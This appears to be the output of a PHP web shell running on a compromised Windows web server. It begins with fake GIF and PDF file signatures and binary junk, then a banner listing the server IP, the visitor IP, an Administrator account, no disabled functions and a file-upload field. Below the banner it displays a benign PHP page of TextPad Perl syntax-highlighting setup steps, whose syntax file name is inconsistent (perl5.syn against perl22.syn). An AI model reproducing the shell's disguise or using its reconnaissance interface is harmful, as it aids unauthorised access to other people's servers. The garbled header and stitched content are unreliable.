GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Setup/TextPad/Perl/ |
Upload File : |
<? // /JimMartinson/Setup/Textpad/TextpadPerlDocumentClassSetup.phpinc $title = "Textpad Perl Document Class Setup"; $headTitle = '_CST_ - '.$title; $pageTitle = '_CST_<br>'.$title; include('common/pageHeader.phpinc'); $sectionTitle = $title; include('common/sectionHeader.phpinc'); ?> <ol class="instruction"> <li><!-- 1 --> Download the <a href="Perl/perl5.syn">perl5.syn syntax file</a> and select <b>Save</b> if using Internet Explorer (IE) or <b>Save File</b> if using Firefox (FF). <br> <img src="01_Save_IE.jpg" width="404" height="269" alt="IE save" /> <img src="01_Save_Firefox.jpg" width="439" height="187" alt="Firefox save" /> </li> <li><!-- 2 --> Save this file in the system folder of your TextPad installation. <br> (Windows Vista or 7: "C:\Program Files (x86)\TextPad 5\system") (Windows XP: "C:\Program Files\TextPad 5\system") <br> <img src="TextPad_system.png" width="863" height="328" alt="TextPad system folder" /> </li> <li><!-- 3 --> Open TextPad and select <strong><u>Configure</u></strong> and <strong>New Document <u>C</u>lass...</strong> from the menu. <br><img src="Perl/03_Configure_NewDocumentClass.png" alt="Configure New Document Class"> </li> <li><!-- 4 --> Enter <strong>Perl</strong> as the Document class name and click Next. <br> <img src="Perl/04_DocumentClassName.jpg" alt="Document class name: Perl"> </li> <li><!-- 5 --> Enter <strong>*.pl</strong> as the Class members and click Next. <br> <img src="Perl/05_DocumentClassMembers.jpg" alt="Document class members *.pl"> </li> <li><!-- 6 --> Click on <strong>Enable systax highlighting</strong>. <br> Select <strong>perl22.syn</strong> from the Syntax definition file select box and click Next. <br> <img src="Perl/06_DocumentClassSyntaxFile.jpg" alt="Syntax file perl5.syn"> </li> <li><!-- 7 --> Click Finish. <br> <img src="Perl/07_DocumentClassFinish.png" alt="Document class finish"> <br> </li> </ol> That's it for TextPad Perl Document Class setup. You can <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">close</a> this window.